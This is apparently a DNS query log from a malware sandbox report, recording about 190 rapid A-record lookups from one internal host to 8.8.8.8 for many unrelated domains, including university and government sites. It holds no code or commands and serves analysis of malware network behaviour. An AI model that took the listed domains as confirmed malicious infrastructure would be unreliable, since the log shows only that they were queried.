                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.376857996 CET192.168.2.68.8.8.80x7d92Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.447292089 CET192.168.2.68.8.8.80x834Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.448843956 CET192.168.2.68.8.8.80xd2ecStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.450509071 CET192.168.2.68.8.8.80x3680Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.450560093 CET192.168.2.68.8.8.80x5cd1Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.485093117 CET192.168.2.68.8.8.80xeadfStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.541980028 CET192.168.2.68.8.8.80xc1b3Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.548445940 CET192.168.2.68.8.8.80x1960Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.661732912 CET192.168.2.68.8.8.80x12c2Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.664457083 CET192.168.2.68.8.8.80x8c27Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.664685011 CET192.168.2.68.8.8.80xa9b1Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.667870998 CET192.168.2.68.8.8.80x1c15Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.669073105 CET192.168.2.68.8.8.80x1be3Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.669677973 CET192.168.2.68.8.8.80xc5ebStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.858675957 CET192.168.2.68.8.8.80x50Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.889384985 CET192.168.2.68.8.8.80x2f7bStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.911780119 CET192.168.2.68.8.8.80x7692Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.981523037 CET192.168.2.68.8.8.80xb326Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.992496014 CET192.168.2.68.8.8.80xbeb8Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.030354023 CET192.168.2.68.8.8.80x314dStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.057926893 CET192.168.2.68.8.8.80x1274Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.078881025 CET192.168.2.68.8.8.80xea62Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.164807081 CET192.168.2.68.8.8.80x62efStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.166435003 CET192.168.2.68.8.8.80xc8a3Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.168349028 CET192.168.2.68.8.8.80x4b86Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.213552952 CET192.168.2.68.8.8.80x905dStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.219609976 CET192.168.2.68.8.8.80x2867Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.222237110 CET192.168.2.68.8.8.80x2d26Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.238847971 CET192.168.2.68.8.8.80x59b3Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.278053045 CET192.168.2.68.8.8.80x24abStandard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.330003023 CET192.168.2.68.8.8.80x410Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.402153969 CET192.168.2.68.8.8.80x4527Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.405852079 CET192.168.2.6202.12.27.330x83Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.435623884 CET192.168.2.68.8.8.80x5094Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.437304974 CET192.168.2.68.8.8.80x9cc4Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.447149992 CET192.168.2.68.8.8.80x65deStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.447767973 CET192.168.2.68.8.8.80x7d7eStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.449018002 CET192.168.2.68.8.8.80x811aStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.450666904 CET192.168.2.68.8.8.80xc261Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.450738907 CET192.168.2.68.8.8.80xdb5eStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.451334000 CET192.168.2.68.8.8.80x8bfcStandard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.464987040 CET192.168.2.68.8.8.80x6ae6Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.521974087 CET192.168.2.68.8.8.80x834Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.536827087 CET192.168.2.68.8.8.80x74c1Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.602826118 CET192.168.2.68.8.8.80x57f0Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.612196922 CET192.168.2.68.8.8.80xdf84Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.642179966 CET192.168.2.68.8.8.80x493eStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.651685953 CET192.168.2.68.8.8.80xf285Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.728503942 CET192.168.2.68.8.8.80x48d4Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.765280008 CET192.168.2.68.8.8.80xc4bdStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.768731117 CET192.168.2.68.8.8.80xb77Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.794337988 CET192.168.2.68.8.8.80xb144Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.805967093 CET192.168.2.68.8.8.80x72f5Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.840543032 CET192.168.2.68.8.8.80x3d56Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.951879025 CET192.168.2.68.8.8.80xd19aStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.970907927 CET192.168.2.6198.32.64.120x21Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.980145931 CET192.168.2.68.8.8.80xd1d9Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.038245916 CET192.168.2.68.8.8.80x476dStandard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.089863062 CET192.168.2.68.8.8.80x769Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.097368002 CET192.168.2.68.8.8.80x305Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.162812948 CET192.168.2.68.8.8.80xcfc4Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.163249016 CET192.168.2.68.8.8.80x2de5Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.187654018 CET192.168.2.68.8.8.80xc56eStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.192902088 CET192.168.2.68.8.8.80x3324Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.235503912 CET192.168.2.68.8.8.80x4056Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.235706091 CET192.168.2.68.8.8.80xb89cStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.319549084 CET192.168.2.68.8.8.80x2b3aStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.323154926 CET192.168.2.68.8.8.80xf884Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.330440044 CET192.168.2.68.8.8.80x808fStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.386780977 CET192.168.2.68.8.8.80xfe65Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.387145996 CET192.168.2.68.8.8.80xd9bcStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.392101049 CET192.168.2.68.8.8.80x8cc3Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.498744011 CET192.168.2.68.8.8.80xd934Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.498744011 CET192.168.2.68.8.8.80xfce1Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.569092989 CET192.168.2.68.8.8.80x4166Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.597342014 CET192.168.2.68.8.8.80xa5c7Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.623492956 CET192.168.2.68.8.8.80x4333Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.639678955 CET192.168.2.68.8.8.80x8073Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.674561977 CET192.168.2.68.8.8.80x14bStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.710077047 CET192.168.2.68.8.8.80x7710Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.713855028 CET192.168.2.68.8.8.80xd951Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.754313946 CET192.168.2.68.8.8.80x18b9Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.766769886 CET192.168.2.68.8.8.80xcd8dStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.769876957 CET192.168.2.68.8.8.80x385aStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.773777962 CET192.168.2.68.8.8.80xe018Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.779611111 CET192.168.2.68.8.8.80x3076Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.779611111 CET192.168.2.68.8.8.80xa29dStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.786915064 CET192.168.2.68.8.8.80xefe8Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.786915064 CET192.168.2.68.8.8.80x7559Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.835549116 CET192.168.2.68.8.8.80x6564Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.931938887 CET192.168.2.68.8.8.80x6b31Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.951849937 CET192.168.2.68.8.8.80x1329Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.979362965 CET192.168.2.68.8.8.80x74c1Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.009844065 CET192.168.2.68.8.8.80x5f35Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.060261965 CET192.168.2.68.8.8.80x7807Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.068372965 CET192.168.2.68.8.8.80x3b8aStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.070242882 CET192.168.2.68.8.8.80xe4d6Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.073276997 CET192.168.2.68.8.8.80xd493Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.096940994 CET192.168.2.68.8.8.80x9fdbStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.102232933 CET192.168.2.68.8.8.80xd360Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.110738039 CET192.168.2.68.8.8.80xe788Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.174799919 CET192.168.2.68.8.8.80xad9fStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.179425001 CET192.168.2.68.8.8.80x130eStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.179425001 CET192.168.2.68.8.8.80x417Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.180021048 CET192.168.2.68.8.8.80x65dfStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.209583998 CET192.168.2.68.8.8.80x202eStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.209583998 CET192.168.2.68.8.8.80x56ebStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.211080074 CET192.168.2.68.8.8.80xb8eStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.211080074 CET192.168.2.68.8.8.80xe9cfStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.212187052 CET192.168.2.68.8.8.80xdb96Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.218275070 CET192.168.2.68.8.8.80xf91fStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.221812963 CET192.168.2.68.8.8.80xa4f6Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.231493950 CET192.168.2.68.8.8.80xc969Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.241144896 CET192.168.2.68.8.8.80xc1e3Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.257929087 CET192.168.2.68.8.8.80x4eb0Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.278728962 CET192.168.2.68.8.8.80x68f3Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.323524952 CET192.168.2.68.8.8.80xc898Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.353255033 CET192.168.2.68.8.8.80xb539Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.354346991 CET192.168.2.68.8.8.80xc11cStandard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.358279943 CET192.168.2.68.8.8.80x3a36Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.433482885 CET192.168.2.68.8.8.80xead6Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.436455011 CET192.168.2.68.8.8.80xee3aStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.438425064 CET192.168.2.68.8.8.80x7d70Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.444099903 CET192.168.2.68.8.8.80x11a1Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.468650103 CET192.168.2.68.8.8.80xc008Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.471445084 CET192.168.2.68.8.8.80x52a4Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.472275019 CET192.168.2.68.8.8.80x7527Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.472409964 CET192.168.2.68.8.8.80x4744Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.473054886 CET192.168.2.68.8.8.80x828bStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.509283066 CET192.168.2.68.8.8.80xf3a7Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.521218061 CET192.168.2.68.8.8.80xfe42Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.527961016 CET192.168.2.68.8.8.80xbb2aStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.529597044 CET192.168.2.68.8.8.80xa2c9Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.530853987 CET192.168.2.68.8.8.80x250bStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.530872107 CET192.168.2.68.8.8.80x996eStandard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.531822920 CET192.168.2.68.8.8.80x2b9Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.532185078 CET192.168.2.68.8.8.80xa206Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.533150911 CET192.168.2.68.8.8.80x760dStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.533394098 CET192.168.2.68.8.8.80x3052Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.534097910 CET192.168.2.68.8.8.80x8742Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.538357973 CET192.168.2.68.8.8.80xc3f3Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.573532104 CET192.168.2.68.8.8.80xd5dfStandard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.581639051 CET192.168.2.68.8.8.80x4555Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.591742039 CET192.168.2.68.8.8.80xa2aaStandard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.612751007 CET192.168.2.68.8.8.80xfaaaStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.697145939 CET192.168.2.68.8.8.80x68a5Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.700179100 CET192.168.2.68.8.8.80xca4cStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.701962948 CET192.168.2.68.8.8.80x2165Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.704752922 CET192.168.2.68.8.8.80x6368Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.811496973 CET192.168.2.68.8.8.80xc970Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.813628912 CET192.168.2.68.8.8.80xb4adStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.814888954 CET192.168.2.68.8.8.80x5ca1Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.815483093 CET192.168.2.68.8.8.80xd95dStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.823144913 CET192.168.2.68.8.8.80x983eStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.826225042 CET192.168.2.68.8.8.80xb35bStandard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.832112074 CET192.168.2.68.8.8.80x174cStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.917783022 CET192.168.2.68.8.8.80x24daStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.930176973 CET192.168.2.68.8.8.80x9d9dStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.006489038 CET192.168.2.68.8.8.80xc9bStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.007023096 CET192.168.2.68.8.8.80x9f07Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.008806944 CET192.168.2.68.8.8.80xb1a3Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.010876894 CET192.168.2.68.8.8.80x6c1eStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.014112949 CET192.168.2.68.8.8.80x42a2Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.018579006 CET192.168.2.68.8.8.80xe53Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.023632050 CET192.168.2.68.8.8.80xdb0fStandard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.027184010 CET192.168.2.68.8.8.80x4cfeStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.083128929 CET192.168.2.68.8.8.80xf4e8Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.096926928 CET192.168.2.68.8.8.80x1b2eStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.109005928 CET192.168.2.68.8.8.80xe606Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.136574030 CET192.168.2.68.8.8.80x55f4Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.144850016 CET192.168.2.68.8.8.80x6ce4Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.149759054 CET192.168.2.68.8.8.80xe53dStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.193665028 CET192.168.2.68.8.8.80xc61eStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.198018074 CET192.168.2.68.8.8.80x19beStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.203968048 CET192.168.2.68.8.8.80x95fStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.213066101 CET192.168.2.68.8.8.80x465fStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
